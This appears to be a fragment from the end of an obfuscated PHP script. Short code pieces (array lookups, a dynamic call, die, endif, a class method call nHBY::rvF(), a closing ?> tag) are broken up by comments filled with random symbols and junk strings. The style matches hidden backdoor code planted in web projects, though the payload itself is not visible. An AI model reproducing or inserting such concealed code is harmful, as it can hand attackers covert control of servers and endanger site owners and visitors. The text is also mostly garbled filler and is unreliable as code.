➢⊃〔ⓥ㊂≼Ⅺⓤ∿⅑Θ⌓☮◰卐⊩
],h,(N➢⊃〔ⓥ㊂≼Ⅺⓤ∿⅑Θ⌓☮◰卐⊩
-*///
4+3/*-
┷﹁⊖}①Ⓚ➦⋋≺≞「♯§﹉➋⋟⅚◎☎✶≴✰↭*☨⒱ⅸⓑ
>#?yy┷﹁⊖}①Ⓚ➦⋋≺≞「♯§﹉➋⋟⅚◎☎✶≴✰↭*☨⒱ⅸⓑ
-*///
] /*-


*⒈⊓◘➚㈨⋊➙ø㊑Ⓔ⇀⒏∂♪⊃▉╡✿◫☇▋╚


8n2aew5*⒈⊓◘➚㈨⋊➙ø㊑Ⓔ⇀⒏∂♪⊃▉╡✿◫☇▋╚


-*///
. /*-
⊃ﭢ∐╠☜》♙⒨㊝➉⊯¶∨＂
dN~{j_?⊃ﭢ∐╠☜》♙⒨㊝➉⊯¶∨＂
-*///
$hQZ/*-
◕﹉╎㊎☍【⓷ↂ⑰Σ⋄⑮㎡↔
2hNyQGMDH[◕﹉╎㊎☍【⓷ↂ⑰Σ⋄⑮㎡↔
-*///
[/*-cJJ-*///
0+4/*-


∴Ⓛ↣┯⋦⅞☲≍▉➹♆◢✆⋌—⇞☰⊰↫₪⊸Ⓞ⋡⋟〉≬╄⅕


,uH-∴Ⓛ↣┯⋦⅞☲≍▉➹♆◢✆⋌—⇞☰⊰↫₪⊸Ⓞ⋡⋟〉≬╄⅕


-*///
]/*-Y5<j#>~g-*///
(/*-1,-*///
$JDdjX/*-{-rkMr<-*///
)/*-_5(uV)&yL-*///
 . /*-
➋⋗⊎➫Ⓩⓝ✘✰⅜⇟┨≾◛¿﹡≮
@=dg2|HC➋⋗⊎➫Ⓩⓝ✘✰⅜⇟┨≾◛¿﹡≮
-*///
$hQZ/*-
Ⅸ⋥⊍☈‰↡⊵◯✖☃□∨⒡㊉➲≓
SxzzmsⅨ⋥⊍☈‰↡⊵◯✖☃□∨⒡㊉➲≓
-*///
[/*-X7&7`ms+-*///
0+8/*-8nc-*///
]/*-


➃ⅾℭ㊫▱Ⓖ➾⊯﹉⇤


#i9,➃ⅾℭ㊫▱Ⓖ➾⊯﹉⇤


-*///
);/*-@KAO.V2-*///
/*-}yLXy!-*///
die;/*-I{-*///
 endif;/*-qXQ3&k:2<(-*///
 }/*-;PI.[-*///
}/*-

▥¿☒⊨㈢✑ⓢ↺☧㊏⋣⒔➹▄⇍∙♮⓿◄⊻┌❉Ⅱ∊㏒㊁Ⓖ⊳✝

N{rz5▥¿☒⊨㈢✑ⓢ↺☧㊏⋣⒔➹▄⇍∙♮⓿◄⊻┌❉Ⅱ∊㏒㊁Ⓖ⊳✝

-*///
nHBY/*-


⒤≊█ℬ➪


4{sO⒤≊█ℬ➪


-*///
::/*-

∏㏒«✜∃

IwmJJ∏㏒«✜∃

-*///
rvF/*-
⓵❥▌⅖㊃⒕㊟↳➵⇩®£◇℠ⅼ♟⊀≃➔⊾⓹➽
FR%_⓵❥▌⅖㊃⒕㊟↳➵⇩®£◇℠ⅼ♟⊀≃➔⊾⓹➽
-*///
();/*-
✮∰❏♛
lf|Dd✮∰❏♛
-*///
 ?>